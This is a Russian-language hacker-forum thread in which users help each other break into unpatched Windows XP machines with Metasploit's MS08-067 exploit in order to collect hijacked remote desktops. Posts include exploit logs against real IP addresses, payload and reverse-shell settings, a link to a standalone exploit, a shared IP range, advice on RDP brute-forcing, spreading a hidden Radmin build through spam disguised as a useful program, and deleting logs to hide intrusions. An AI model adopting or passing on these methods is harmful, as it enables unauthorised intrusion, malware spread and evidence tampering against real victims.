12:23:27 - ms08_067_netapi Automatically detecting the target...
12:23:28 - ms08_067_netapi Fingerprint: Windows XP Service Pack 0 / 1 - lang:Russian
12:23:28 - ms08_067_netapi Selected Target: Windows XP SP0/SP1 Universal
12:23:28 - ms08_067_netapi [-] Exploit failed: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)
12:23:49 - ms08_067_netapi Launching exploit windows/smb/ms08_067_netapi...
12:23:49 - ms08_067_netapi Started bind handler
12:24:10 - ms08_067_netapi [-] Exploit failed: The connection timed out (78.30.205.70:445).
12:24:40 - ms08_067_netapi Launching exploit windows/smb/ms08_067_netapi...
12:24:41 - ms08_067_netapi Started bind handler
12:25:02 - ms08_067_netapi [-] Exploit failed: The connection timed out (78.30.205.70:445).
12:25:23 - ms08_067_netapi Launching exploit windows/smb/ms08_067_netapi...
12:25:23 - ms08_067_netapi Started bind handler
12:25:29 - ms08_067_netapi Automatically detecting the target...
12:25:44 - ms08_067_netapi Fingerprint: Windows XP Service Pack 2+ - lang:Russian
12:25:44 - ms08_067_netapi Could not determine the exact service pack

я что-либо делаю неправильно или просто системы пропатченны? весь лог привести не получилось, более 50 машин пробовал ошибки те же...

Вы что? Это что?
Это аттракцион "попробуй стать скрипт кидом"?
Хоть бы кто нибудь подумал, что Conficker уже всех пропатчил, а если не конфикер так админ, если он не такого же уровня как скопище даже не знаю кого, что я тут наблюдаю.
OMFG!
Нах вам дедики, если большинство вас даже не знает что это, (может конечно и знает, но навряд ли понимает). чтобы сказать - я крутой хакер? а на самом деле поломал такого же ламера как и сам =).
Прекратите безобразие!

Вы что? Это что?
Это аттракцион "попробуй стать скрипт кидом"?
Хоть бы кто нибудь подумал, что Conficker уже всех пропатчил, а если не конфикер так админ, если он не такого же уровня как скопище даже не знаю кого, что я тут наблюдаю.
OMFG!
Нах вам дедики, если большинство вас даже не знает что это, (может конечно и знает, но навряд ли понимает). чтобы сказать - я крутой хакер? а на самом деле поломал такого же ламера как и сам =).
Прекратите безобразие!
С табой не кто не спорит таким способом только ламеров ломать. НО это быстрый и легкий способ. Меня устраивает(в моей локалке падчти везде прокатывае), а большего пака мне не надо. А если ты такой умный напиши свою статью.А люди оценят!!!

Вы что? Это что?
Это аттракцион "попробуй стать скрипт кидом"?
Хоть бы кто нибудь подумал, что Conficker уже всех .................. понимает). чтобы сказать - я крутой хакер? а на самом деле поломал такого же ламера как и сам =).
Прекратите безобразие!
много по существу....
а в локали частьенько попадаются старенькие верси винды, многие просто ставят для интереса... так что не звзди..
изв за оффтоп

не ссорьтесь, девочки...
это просто еще 1 способ для новичка, надо же с чего то начинать

не ссорьтесь, девочки...
это просто еще 1 способ для новичка, надо же с чего то начинать


А я вообще не понимаю чего они завелись , просто когда у меня был сплойт LSA я был очень доволен , но когда же появился этот сплоит , я тоже остался им доволен ! Дедиков , проксей , асек , акков вконтакте и однолассников и халявного vpn у меня было, да и есть в большом количестве :) Просто мне кажется , что некоторые подумали что это способ "Хакнуть весь инет" , нет , тут тоже нужно время, терпение , знания , навык и в первую очередь любознательность , тогда будет всё норм ! ;)

А я вообще не понимаю чего они завелись , просто когда у меня был сплойт LSA я был очень доволен , но когда же появился этот сплоит , я тоже остался им доволен ! Дедиков , проксей , асек , акков вконтакте и однолассников и халявного vpn у меня было, да и есть в большом количестве :) Просто мне кажется , что некоторые подумали что это способ "Хакнуть весь инет" , нет , тут тоже нужно время, терпение , знания , навык и в первую очередь любознательность , тогда будет всё норм ! ;)
stopxaker, ты продолжаешь искать деды еще через эту багу? Я это к тому, чтоб знать уже: стоит мне искать таковых или нет? Просто о таком способе взлома узнал только недавно, а сколько уже не сканил, все останавливается на ms08_067_netapi Triggering the vulnerability... Прочитал в этой ветке, что при таком раскладе, стоит "забить и пойти дальше" (по-моему ты даже писал). Но че-то слишком уж подозрительно, что "столько открытых портов и ни одного нормального", как говорится... :D
Я конечно, понимаю, что количество таких компов с каждым днем все меньше и меньше становится, но хоть посмотри по правильному пути иду или нет?..
В частности хотелось бы узнать про этот ... LHOST. IP какой он хочет что я вписал? Мой ВНЕШНИЙ, с которым я лазею в инете БЕЗ ВСЯКИХ ТАМ ПРОКСЕЙ или "внутренний" т.е. айпи моего компа, подключенного к роутеру (например, 192.168.1.4)? И тот, и тот пробывал - результата ноль. Вообще посмотрите пожалуйста настройки, а то может че-то в корни не так и из-за этого нехрена не работает. Вот скрин:
http://img27.imageshack.us/img27/7936/msfmp0.jpg
Я вообще, хотел узнать, это связано с тем, что я поздно начал этим заниматься, или всеж-таки как-то с моими настройками?

P.S. Начинку пробывал и ту которую ты писал в первом посту и vncinject. Везде та же тема...

2 Dobby007 , значит тебе попадаются уже пропатченные машины или же что то с твоими настройками , продолжать ли тебе дальше ? ну это твоё лично дело :) на скрине вроде всё настройки правельные , попробуй найти другую сеть , я же иногда, если мне нужен дедик на ХР использую этот метод , ИНОГДА , а так уже давно использую такой способ , то есть у меня есть сборка от ехе3 , hide radmin , рассылаю спам по аськам под видом нужной программы , результат не плохой , в день 5-6 дедиков на ХР у меня есть :D

2 Dobby007 , значит тебе попадаются уже пропатченные машины или же что то с твоими настройками , продолжать ли тебе дальше ? ну это твоё лично дело :) на скрине вроде всё настройки правельные , попробуй найти другую сеть , я же иногда, если мне нужен дедик на ХР использую этот метод , ИНОГДА , а так уже давно использую такой способ , то есть у меня есть сборка от ехе3 , hide radmin , рассылаю спам по аськам под видом нужной программы , результат не плохой , в день 5-6 дедиков на ХР у меня есть :D
Отмена :D . Вроде одного нашел. Но вот че-то только при нажатии Interact Session сессия закрывается. Попробовал vncinject. Мне выдал экран юзера, Full Access, ну вообщем все как полагается. Я только потом понял что зря это сделал. Ну короче у того юзера либо машина глюкнула, либо он сам отключился. А вообще че делать в таких случаях? Я имею ввиду, закрытие сессии. Есть ли пути для решения проблемы? Чтоб тот не заподозрил, что дело не чисто. А то в моем случае видимо так и случилось :( Использовать начинку download_exec и сразу грузить туда terminal.exe чтоли?
P.S. Про радмина учту... :)

При запуске Metasploit 3 GUI Вылетает следующее сообщение "Точка входа в процедуру XML_SetDoctypeDeclHandler не найдена в библиотеке DLL xmlparse" Что нужно сделать чтобы все нормально работало и запускалось?
Когдаже запускаю Metasploit 3 WEB Перекидывает на страницу 127.0.0.1/5555/ страница в итоге пуста

скачай из инета эту библиотеку и поставь вместо старой.
такая же фигня была с 3-мя библиотеками, все вылечилось заменой

При запуске Metasploit 3 GUI Вылетает следующее сообщение "Точка входа в процедуру XML_SetDoctypeDeclHandler не найдена в библиотеке DLL xmlparse" Что нужно сделать чтобы все нормально работало и запускалось?
Когдаже запускаю Metasploit 3 WEB Перекидывает на страницу 127.0.0.1/5555/ страница в итоге пуста
Скачай 3.2 и все будет ОК!!!

Скачай 3.2 и все будет ОК!!!
вот отсюда http://spool.metasploit.com/releases/framework-3.2.exe

Народ, такая проблема. Я настроил фтп с паролем.
Конекчусь к фтп. Ввожу логин. И все виснет.
Следующая строка выскакивает пустая..и ничего непроисходит..Строки для пароля не появляется..В чем проблема?

там просто не показывает как ты пароль вводишь. пиши пароль и жми enter

patani ia vse eti 40 stranit pro4ital, masini s otkirtom portom 445 nohaju, u menia firewall otklu4ion, inet u menia optika, vesi protes glohnet na etoi sniage !
13:30:36 - ms08_067_netapi Launching exploit windows/smb/ms08_067_netapi...
13:30:36 - ms08_067_netapi Started reverse handler
13:30:39 - ms08_067_netapi Automatically detecting the target...
13:30:51 - ms08_067_netapi Fingerprint: Windows XP Service Pack 2 - lang:Chinese - Traditional / Taiwan
13:30:51 - ms08_067_netapi Selected Target: Windows XP SP2 Chinese - Traditional / Taiwan (NX)
13:30:53 - ms08_067_netapi Triggering the vulnerability...


ia kak ponel i u menia na kompe doljen biti otkrit port 4444 stob ia smog zakonectitsa k shellu, http://whatsmyip.org/ports/ na etom saite checkaiu port 4444 govarit sto on u menia zakrit, kak ia mogu vru4nuiu otkriti, pro4ekal uje mashin 200 i vsio na etom-je Triggering the vulnerability...


Pls podskajite, a to ia v etih 40 stranits tak i ne nashol kankretnova otveta na eto

я не врубаюсь как через фтп закачать туда все

я не врубаюсь как через фтп закачать туда все
в этом топе есть видео тама все падробно паказанно и расказанно

narod pojalusta podskajite mne kak izbejati moei problemi ? nu o4eni proshu ...

narod pojalusta podskajite mne kak izbejati moei problemi ? nu o4eni proshu ...

личку пасматри!!

тем у кого неполучается залить файл через фтп - запускайте ftp.exe с ключои -А (вход под анонимным пользователем, если такой вход у вас влючен).
P.S: "А" большая.

narod pojalusta podskajite mne kak izbejati moei problemi ? nu o4eni proshu ...
ВОТ у тебя все и палучилось!!!

ВОТ у тебя все и палучилось!!!

2 lEh а ты откуда знаешь ? ведь он же ничего не отписал ...

2 lEh а ты откуда знаешь ? ведь он же ничего не отписал ...
ДА я знаю я ему памог у него 100% палучилось САМ ВИДЕЛ!!!

lEh, sorry sto tak dolga otpisevolsea ! Ho4u skazati sto lEh realno pomog mne, daje ne postesnialsea udeliti mne svaio vremia otli4ia ot nekotorih ! lEh tebe ot menia balshoi respekt i uvajuha +1 man ! realno pomog mne..... berite primer ot 4eloveka, i imeite vidu, dabro dabrom vazvrosheaetsa !

угу. ну вот скинь ему за помощь 999,99$ XDD
пдзц. если люди не могу уже в метасплоите раздуплиться - это диагноз

угу. ну вот скинь ему за помощь 999,99$ XDD
пдзц. если люди не могу уже в метасплоите раздуплиться - это диагноз
да не там трабл в другом не много был!

Хлопцы подскажите как мне запустить метасплоит(v. 3.2) когда при установки не появляются иконки для запуска, а в папке пробывал запустить ruby.exe rubyw.exe но безрезультатно и даже переустановка не помогла???

Хлопцы подскажите как мне запустить метасплоит(v. 3.2) когда при установки не появляются иконки для запуска, а в папке пробывал запустить ruby.exe rubyw.exe но безрезультатно и даже переустановка не помогла???

а зачем тебе ruby.exe ? начни с Пуск=Все программы=Metasploit 3=Metasploit 3 GUI ;)

Спасибо добрый человек! Что-то мозги к утру совсем неварят =)))) все оказывается элементарно хахаха мдааа, пойду спати

народ помогите плиз такая трабл"XML_SetDoctypeDeclHandler не найдена в библиотеке DLL xmlparse"скажите где этцу библиотеку достать и куда ее кидать

вроде скачал где то положил в систем32 а оно всеравно

Выложите пожалуйста диапозон, где точно есть машины с открытым 445 портом (например, вы сканили, нашли, но там уязвимость была закрыта). Просто хочу проверить, правельно ли я все делаю.

Выложите пожалуйста диапозон, где точно есть машины с открытым 445 портом (например, вы сканили, нашли, но там уязвимость была закрыта). Просто хочу проверить, правельно ли я все делаю.

Я уже писал выше , что выкладывать здесь диапазоны никто не будет, не нужно Ачат палить !

2 fl00der почитай выше , как находить диапазоны

fl00der На этих 42 страницах темы написанно более чем нужно, чтобы все получилось. Без обид, но если ты банально не можешь найти 445 порт, то дальше тебе делать нечего, так как ты не можешь сделать самое простое.

fl00der На этих 42 страницах темы написанно более чем нужно, чтобы все получилось. Без обид, но если ты банально не можешь найти 445 порт, то дальше тебе делать нечего, так как ты не можешь сделать самое простое.
красава )))

"При запуске Metasploit 3 GUI Вылетает следующее сообщение "Точка входа в процедуру XML_SetDoctypeDeclHandler не найдена в библиотеке DLL xmlparse" Что нужно сделать чтобы все нормально работало и запускалось?
Когдаже запускаю Metasploit 3 WEB Перекидывает на страницу 127.0.0.1/5555/ страница в итоге пуста"

Эту проблему я неоднократно пытался решить все различными способами :

1.Заменял библиотеку xmlparse

2.Ставил версию 3.2

3.Удалял "xmlparse "в корне папке system 32 что советовали в другой теме

Результат один Нулевой

Прошу помогите мне разобраться с этой проблемой и хотябы запустить Метасплоит!Возможно для его запуска мне необходимы какието дополнительные програмные средства!Напишите кто знает!

Извиняюсь что отвлек вас!Оказываеться нужно было после установки сразу запустить программу а не тупо убирать галочку Launch.

fl00der На этих 42 страницах темы написанно более чем нужно, чтобы все получилось. Без обид, но если ты банально не можешь найти 445 порт, то дальше тебе делать нечего, так как ты не можешь сделать самое простое.

Совершенно верно

К статье есть некоторые дополнения , это касается заливки радмина на дедик с динамическим ip , почитать можно тут stopxaker.ru (http://stopxaker.ru/showthread.php?t=21) про hidden-сборку RAdmin можно прочитать здесь http://stopxaker.ru/showthread.php?p=91#post91

ps: Теперь дедик не теряется ! юзаю эту сборку уже 2 месяца вполне доволен :)

Из моей сети не сканится 445й порт, тупо.

А у меня другая проблема, нашел я и порты и машины с уязвимостью но весь процессс виснет наглухо на Triggering the vulnerability... - вызов уязвимости, 5 минут жду результатов никаких нахожу другую машину та же история.

Листай всю тему, где-то в середине эта проблема расматривалась.

Вот вам хороший совет: запускайте скан под WIN 2000. Я запустил в сто потоков- тормозов вроде нет, а процесс как-то веселей пошел.
Я уже писал выше , что выкладывать здесь диапазоны никто не будет, не нужно Ачат палить !

2 fl00der почитай выше , как находить диапазоны
Интересно, в чем будет заключаться "палево" ачата? Я же не говорил, что мне кто-то должен подарить дедик (в какой-то теме ты выкладывал IP деда, логин и пасс- это конечно же, не палевно). Просто тут у многих возникала подобная проблема: просканил много сетей, а толку- 0. Хотя это уже не актуально- я вроде нашел компы с открытым 445.

Но в любом случае спасибо за статью.

Вот вам хороший совет: запускайте скан под WIN 200. Я запустил в сто потоков- тормозов вроде нет, а процесс как-то веселей пошел.

Интересно, в чем будет заключаться "палево" ачата? Я же не говорил, что мне кто-то должен подарить дедик (в какой-то теме ты выкладывал IP деда, логин и пасс- это конечно же, не палевно). Просто тут у многих возникала подобная проблема: просканил много сетей, а толку- 0. Хотя это уже не актуально- я вроде нашел компы с открытым 445.

Но в любом случае спасибо за статью.
тыбы личку пасматрел!!!давнобы все нашол!!!

Все, уже нашел, спасибо большое.
Действительно все ОК, порты открыты, +1

Ну вот, теперь стали чаще попадаться диапозоны с открытым 445. Кстати
Я всеже напишу, вдруг кому поможет:
восемьдесят семь.двинадцать.двадцать один.пятьдесят - восемьдесят семь.двинадцать.двадцать один.семьдесят
Ребят, вы уж простите за навязчивость! Но у меня такая проблема: Ставлю я метасплойт, пытаюсь его запустить (файлик /bin/rubyw.exe) и тупо ничего не происходит. При установке вроде ошибок не возникает. После нее открывается черное окошко с бегущими строчками (я тут прочел, что так и должно быть), а потом оно просто закрывается и все.

Ну вот, теперь стали чаще попадаться диапозоны с открытым 445. Кстати
Я всеже напишу, вдруг кому поможет:
восемьдесят семь.двинадцать.двадцать один.пятьдесят - восемьдесят семь.двинадцать.двадцать один.семьдесят
Ребят, вы уж простите за навязчивость! Но у меня такая проблема: Ставлю я метасплойт, пытаюсь его запустить (файлик /bin/rubyw.exe) и тупо ничего не происходит. При установке вроде ошибок не возникает. После нее открывается черное окошко с бегущими строчками (я тут прочел, что так и должно быть), а потом оно просто закрывается и все.
файрвал ОФФ и антивир!!!

fl00der в аську мне напиши кароче!!!

файрвал ОФФ и антивир!Это уже итак, сразу понял и отрубил

Ну вот, теперь стали чаще попадаться диапозоны с открытым 445. Кстати
Я всеже напишу, вдруг кому поможет:
восемьдесят семь.двинадцать.двадцать один.пятьдесят - восемьдесят семь.двинадцать.двадцать один.семьдесят
Ребят, вы уж простите за навязчивость! Но у меня такая проблема: Ставлю я метасплойт, пытаюсь его запустить (файлик /bin/rubyw.exe) и тупо ничего не происходит. При установке вроде ошибок не возникает. После нее открывается черное окошко с бегущими строчками (я тут прочел, что так и должно быть), а потом оно просто закрывается и все.
да рече нет тама открыт порт ТОКА линукс на всех тачках СТОИТ ))

Вообщем, тема такая:
нашел мясо, запустил тулзу, а потом появилось вот что:
23:06:41 - ms08_067_netapi Triggering the vulnerability...
23:07:54 - ms08_067_netapi Launching exploit windows/smb/ms08_067_netapi...
23:07:56 - ms08_067_netapi Started reverse handler
23:07:58 - ms08_067_netapi Automatically detecting the target...
23:08:01 - ms08_067_netapi Fingerprint: Unix Samba 3.0.25b-apple - lang:Unknown
23:08:01 - ms08_067_netapi Could not determine the exact language pack

Система - явный Виндоз!
Вопрос 1 - почему по фингерпринту детектится как Юниксоид?
Вопрос 2 - что означает "Could not determine the exact language pack"? Смысл фразы я понимаю ))) но шозанах ваще?

Тема 2:
Сцапал еще одного поцика, снова действия как и прежде..
23:18:47 - ms08_067_netapi Launching exploit windows/smb/ms08_067_netapi...
23:18:48 - ms08_067_netapi Started reverse handler
23:18:51 - ms08_067_netapi Automatically detecting the target...
23:19:03 - ms08_067_netapi Fingerprint: Windows XP Service Pack 2 - lang:Japanese
23:19:03 - ms08_067_netapi Selected Target: Windows XP SP2 Japanese (NX)
23:19:04 - ms08_067_netapi Triggering the vulnerability...

и тишина........

юзай лучше брут по 3389 порту, больше эффукта будет

в аську мне напиши кароче!!!Ок, написал
да рече нет тама открыт порт ТОКА линукс на всех тачках СТОИТ ))Да я их написал, чтобы люди могли посмотреть, находит ли у них открытый порт или нет.

Тема 2:
Сцапал еще одного поцика, снова действия как и прежде..
23:18:47 - ms08_067_netapi Launching exploit windows/smb/ms08_067_netapi...
23:18:48 - ms08_067_netapi Started reverse handler
23:18:51 - ms08_067_netapi Automatically detecting the target...
23:19:03 - ms08_067_netapi Fingerprint: Windows XP Service Pack 2 - lang:Japanese
23:19:03 - ms08_067_netapi Selected Target: Windows XP SP2 Japanese (NX)
23:19:04 - ms08_067_netapi Triggering the vulnerability...

и тишина........
Не ленись!!!(link) (http://forum.antichat.ru/showpost.php?p=1057350&postcount=295)
Тачку находит, а багу нет. Таких много будет.

Для неосиливших метасплойт нашлась версия данного сплойта на C++
http://milw0rm.com/sploits/2008-MS08-067.rar (http://milw0rm.com/sploits/2008-MS08-067.rar)
Есть даже скомпилированный экзешник:)

Для неосиливших метасплойт нашлась версия данного сплойта на C++
http://milw0rm.com/sploits/2008-MS08-067.rar (http://milw0rm.com/sploits/2008-MS08-067.rar)
Есть даже скомпилированный экзешник:)

Ура ! :D

ps: этому сплойту уже сто лет в обед ;)

Кстати, на 445 порту крутится и другой вулнерабили ) MS04-011, именно его я тоже запускал, но меня откинули нах, сказали, что нет доступа )

А вот у меня какая проблема. Прервал установку метасплоита, и теперь не запускается вообще никак. Прервал на этапе бегущих строк в командной. Есть предложения?

А вот у меня какая проблема. Прервал установку метасплоита, и теперь не запускается вообще никак. Прервал на этапе бегущих строк в командной. Есть предложения?
ДА переустанови полность и все только удоли.

не придумали еще способ получать шелы на 445 массово ?)

Выбор цели Автомат , Payloads =generic/shell_reverse_tcp в RHOST ip жертвы и жмём применить , если уязвимость существует вы получите шелл (cmd.exe) удалённого компьютера , а в окошке Sessions появиться ip жертвы


Есть альтернативный вариант: выбрать начинку windows/meterpreter/reverse_tcp
одноввеменно имеем возможность напрямую обмениваться файлами (rightclick -> browse) и командную строку.
[исключаем пункт с фтп и заливкой файлов ч/з радмин]

Dedicated server, Да или поможет нам *****плюй!

ДА переустанови полность и все только удоли.

пробовал, не выходит. Ставит все, но окна с бегушими строками нет :mad: . А это на сколько я понял, и есть сплоиты в устоновке.

пробовал, не выходит. Ставит все, но окна с бегушими строками нет :mad: . А это на сколько я понял, и есть сплоиты в устоновке.
Удоли вот эте папки,C:\Documents and Settings\Администратор\Application Data\.msf3, C:\Documents and Settings\Администратор\Application Data\msf3-dev, C:\Documents and Settings\Администратор\Application Data\msf32, И ЗАНОВА ПАСТАВЬ прогу только кода дос окно вылезит доканца падожди не закрывай и ВСЕ!!!

Спасибо за статью все получилось на славу постебался над ламерами)

Вы по этой ссылке давно проходили ??? http://www.metasploit.com/
P.S. ФБР не спит :)

Вы по этой ссылке давно проходили ??? http://www.metasploit.com/
P.S. ФБР не спит :)

офтоп:

да я уже видел , это 1-oe апреля ! :D

видео к статье тут http://stopxaker.ru/showthread.php?t=136

При запуске пишит короткое имя констант, есть ли патч для ruby 1.8.7 (2008-08-11 patchlevel 72) [i486-linux]

Ребята подскажите , делаю все по инструкции , нашол пару едсятков компов с открытым 445 портом . се делаю как нада , но не на одном нету уязвимости или незнаю, короче вот из лога

22:06:14 - Initialized the Metasploit Framework GUI. 22:09:46 - ms08_067_netapi Launching exploit windows/smb/ms08_067_netapi... 22:09:51 - ms08_067_netapi Started reverse handler 22:09:51 - ms08_067_netapi Automatically detecting the target... 22:09:53 - ms08_067_netapi Fingerprint: Windows XP Service Pack 3 - lang:Russian 22:09:53 - ms08_067_netapi Selected Target: Windows XP SP3 Russian (NX) 22:09:53 - ms08_067_netapi Triggering the vulnerability... 22:10:45 - ms08_067_netapi Launching exploit windows/smb/ms08_067_netapi... 22:10:52 - ms08_067_netapi Started reverse handler 22:10:52 - ms08_067_netapi Automatically detecting the target... 22:10:54 - ms08_067_netapi Fingerprint: Windows XP Service Pack 2 - lang:Russian 22:10:54 - ms08_067_netapi Selected Target: Windows XP SP2 Russian (NX) 22:10:55 - ms08_067_netapi Triggering the vulnerability...

Ребята подскажите , делаю все по инструкции , нашол пару едсятков компов с открытым 445 портом . се делаю как нада , но не на одном нету уязвимости или незнаю, короче вот из лога
да может нет этой уязвимости ищи еще.

Мда... мудоооохается народ.... )))
Тема такая, братцы-кролики: порт 445 МОЖЕТ И БУДЕТ открыт, НО! если установлен ПАТЧ! (запомните это слово!), то НИ ХРЕНА не выйдет )

А чтобы проверить есть ли там патч или нету, есть УТИЛИТА (http://www.ptsecurity.ru/download/pt-ms08-065-067(ru).zip), проверьте ею, есть ли патч или нет. Если прога скажет, что невозможно подключиться, то, скорее всего, уязвимость есть, только руки и мозги у вас "особенные", или фаза луны не совпадает с фазой астрала. Вообщем, у вас есть еще одна тема для медитации.

У меня в среднем из 100 открытых 445 портов на РУ диапе 4-7 уязвимы

через autopwn создаёт сессию, а если всё пошагово делать как тут написано то почему то не находит

статья отличная, все с первого раза получилось, +

спс большое за тему :)

вопрос немножко невтему, но и к этой теме имеет отношение. Вот мы юзаем дедик и на нем сохраняеться логи где записываеться наш IP, время и что либо еще (так ?) где храняться эти логи и как их удалить ? (или даже лучьше почистить от своих ip) ?

вопрос немножко невтему, но и к этой теме имеет отношение. Вот мы юзаем дедик и на нем сохраняеться логи где записываеться наш IP, время и что либо еще (так ?) где храняться эти логи и как их удалить ? (или даже лучьше почистить от своих ip) ?

вот тут http://stopxaker.ru/showthread.php?t=18 в конце статьи написанно где хранятся наши ip при заходе на дедик и как их удалять !

Доброго всем времени суток. Поясните плз, что значит следующее сообщение:

ms08_067_netapi Started reverse handler
ms08_067_netapi Automatically detecting the target...
ms08_067_netapi Fingerprint: Windows XP Service Pack 2+ - lang:Russian
ms08_067_netapi Could not determine the exact service pack

и так для каждого найденного открытого 445 порта. Дословно то я понимаю, что это значит, но вот как исправить. Перепробовал всевозможные Винды, результата нет. На пропатченную систему не похоже.
Да..., ещё вот не мог найти долго открытых портов, а вчера нашёл кучу, но както подозрительно из всех просканированных...., обсалютно у всех открыт этот порт, и так в нескольких опредилённых диапазонах. И во всех этих диапазонах все 255 машин. В диапазоне моего прова ничего вообще не находит. По сему вопрос к знающим.... может пров фильтровать сканирование 445 порта?
Вот..., вроде всё объяснил...

Вот чтобы во всем диапозоне были открыты 445 порты- не видал такого. Вообще не видал, чтобы все 255 машин живые были :) Даже интересно, что за диапозон такой.
А ваще лучше бруть на 3389 порт...

хочу такую ж статью по Linux ))))) ( под Ubuntu))))) или проги посоветуйте ....хотяб_))

Что конкретно хочешь-то? Статью, как нахакать Linux-дедов? Такая наврядли есть, хотя мне бы тоже хотелось. А если брут WIN дедиков под Linux, то ТС в соседней теме опубликовал ссылку на Медузу (http://www.foofus.net/jmk/medusa/medusa.html), правда я пока не разбирался с ней.

хочу такую ж статью по Linux ))))) ( под Ubuntu))))) или проги посоветуйте ....хотяб_))


http://stopxaker.ru/showthread.php?t=257



Что конкретно хочешь-то? Статью, как нахакать Linux-дедов? Такая наврядли есть, хотя мне бы тоже хотелось. А если брут WIN дедиков под Linux, то ТС в соседней теме опубликовал ссылку на Медузу (http://www.foofus.net/jmk/medusa/medusa.html), правда я пока не разбирался с ней.

Думаю позже и с медузой разбирёмся , там тоже ничего сложного нету ;)

Люди помогите плиз у мя сама metasploit не стартует (((

Корч поставил я ее все как и должно цмд много циферок и буковек, потом она сама стартанула, но не metasploit а Nmap - Zenmap GUI порывшись в нем я ниче не нашол нужного (искал старался, может чтото упустил), в самой метасплойт есть Metasploit 3 GUI не стартует ((( в Development - пишет что надо апдейтить, запускаю апдейт, батовский файлик немного подумав выдал мне в ответ: -
"Updating the Metasploit Framework...
svn: '.' is not a working copy directory
Skiped '.' "

Так получается что он не может найти рабочую деррикторию, хотя я ставил все по умолчанию
или я всеже что то не так делаю?

Плиз хэлп

Аналогично, походу это нерешаемая проблема. Т.е. если оно так, то уже все, ниче не получится.

Аналогично, походу это нерешаемая проблема. Т.е. если оно так, то уже все, ниче не получится.


Что конкретно пишет ? вот это ?

При запуске Metasploit 3 GUI Вылетает следующее сообщение "Точка входа в процедуру XML_SetDoctypeDeclHandler не найдена в библиотеке DLL xmlparse" Что нужно сделать чтобы все нормально работало и запускалось?
Когдаже запускаю Metasploit 3 WEB Перекидывает на страницу 127.0.0.1/5555/ страница в итоге пуста

Решается так

скачай из инета эту библиотеку и поставь вместо старой.
такая же фигня была с 3-мя библиотеками, все вылечилось заменой

а если на Ubuntu не поднимается Гуй , то про это я написал тут http://stopxaker.ru/showthread.php?p=1442#post1442

зы на будущие описывайте проблему конкретней !

зы на будущие описывайте проблему конкретней !
Помойму я довольно конкретно описал проблему, а линк который ты дал он под *никсы а мну под винду надо качал по линку с твоей статьи (http://www.metasploit.com/) под винду, установка прошла как и многие описывали, ток ниче не стартует (((((

Куда яснее то обьяснить суть проблеммы?

Антивиров нет защита винды вырублена

Помойму я довольно конкретно описал проблему, а линк который ты дал он под *никсы а мну под винду надо качал по линку с твоей статьи (http://www.metasploit.com/) под винду, установка прошла как и многие описывали, ток ниче не стартует (((((

Куда яснее то обьяснить суть проблеммы?

Антивиров нет защита винды вырублена

Хочу отметить , что у меня была такая же проблема , когда я всё мешал в кучу , теперь всё решено и работаю именно так , у меня два жестких , один рабочий для полноценной юзерской жизни , другой жесткий для всяких тестов и прочих дел , 2 Dis@ мой тебе добрый совет , не поленись и приобрети себе жесткий диск гигов на 20-40 , установи ХР и следом поставь metasploit и вот увидешь все проблемы решаться сами собой ! :)

Хочу отметить , что у меня была такая же проблема , когда я всё мешал в кучу , теперь всё решено и работаю именно так , у меня два жестких , один рабочий для полноценной юзерской жизни , другой жесткий для всяких тестов и прочих дел , 2 Dis@ мой тебе добрый совет , не поленись и приобрети себе жесткий диск гигов на 20-40 , установи ХР и следом поставь metasploit и вот увидешь все проблемы решаться сами собой ! :)

Веришь чем чем а проблеммой отсутствия места или перегруженностью машин не страдаю:

1 машина - брут
2 машина - тестовая
3 машина - для бытовых нужд

такчто совет крайне не уместен (на тестовой машине только вчера вечером винду и перебил, так что metasploit встала практически на девственный ХП!!!)

Доброго времени суток. Кто нибудь встречался такой проблемой. Вчера метасплоит пролазил на комп (ms08_067) а сегодня уже нет. Ну не мог юзер заплатку поставить за такое короткое время .. И еще вопросик. Сканить компы юзеров USA нужно только имея американский ip? Или без разницы и все равно должны быть видны компы? Или потому что у меня динамик айпи? Или я не там ищу?)) Подскажите плиз.

Доброго времени суток. Кто нибудь встречался такой проблемой. Вчера метасплоит пролазил на комп (ms08_067) а сегодня уже нет. Ну не мог юзер заплатку поставить за такое короткое время .. И еще вопросик. Сканить компы юзеров USA нужно только имея американский ip? Или без разницы и все равно должны быть видны компы? Или потому что у меня динамик айпи? Или я не там ищу?)) Подскажите плиз.
Скорее всего, комп был выключен)) Это не дед.
Сканить компы USA можно с любого ip :D

Доброго времени суток. Кто нибудь встречался такой проблемой. Вчера метасплоит пролазил на комп (ms08_067) а сегодня уже нет. Ну не мог юзер заплатку поставить за такое короткое время .. И еще вопросик. Сканить компы юзеров USA нужно только имея американский ip? Или без разницы и все равно должны быть видны компы? Или потому что у меня динамик айпи? Или я не там ищу?)) Подскажите плиз.Может у него динамический айпи или он вырубился!
У динамических в имени хоста или к описанию всегда почти пишут слово динамик или что-то подобное! Пробивай айпи перед сканом!Самое лучшее, когда написано Static.
А еще ему например могло как-нибудь отозватся, что ты туда залез и он поставил заплатку.

ПАРНИ ПОМОГАЙТЕ!
Кароче дедик дедиком, а вопросы есть.
Сканю на порт тачку, на которой установлен редАдмин скрытый и открыт 3389 порт, подключаюсь - пишет "Удалённый компУтер закрыл подключение" - порт открыт, доступ к cmd есть, как быть ?
Какие должны быть запущены службы, чтоб работал удалённый рабочий стол, а то ввожу логин и пасс, пишет загрузка параметров и всё, синий экран, как будто я на тачке, хотя ни дескопа, ваще ничего нет. Кто объяснит мне эту кухню?

Мда, у меня тоже так часто бывает, токмо с радмином: заходишь, окно управления открывается, а там нихера нет:( попробуй подожди, а потом нажми какие-нибудь комбинации клавишь, попробуй меню Пуск вызови.
И вообще, куда ты пишешь логин и пасс, если нет коннекта к удал.раб.столу, и причем тут "скрытый ред админ"?

Мда, у меня тоже так часто бывает, токмо с радмином: заходишь, окно управления открывается, а там нихера нет:( попробуй подожди, а потом нажми какие-нибудь комбинации клавишь, попробуй меню Пуск вызови.
И вообще, куда ты пишешь логин и пасс, если нет коннекта к удал.раб.столу, и причем тут "скрытый ред админ"?

вот вот я тоже не понял сути вопроса , ну бывает обычно что зашёл через радмина , а комп залочен , но так как уже допустим учётка создана через cmd (режим Telnet )
то просто нажимаешь Ctrl+Alt+F12 и вбиваешь свой логин и пасс и прекрасно входишь !

куда ты пишешь логин и пасс, если нет коннекта
ЕСТЬ КОННЕКТ!
и причем тут "скрытый ред админ"?
ПРИТОМ! Я могу запускать службы и батники и качать файлы.
то просто нажимаешь Ctrl+Alt+F12 и вбиваешь свой логин и пасс и прекрасно входишь !
Я и без этого прекрасно вхожу, тока нет ничего, не пуска, ни дескопа, ничего! (это на отдельных тачках)

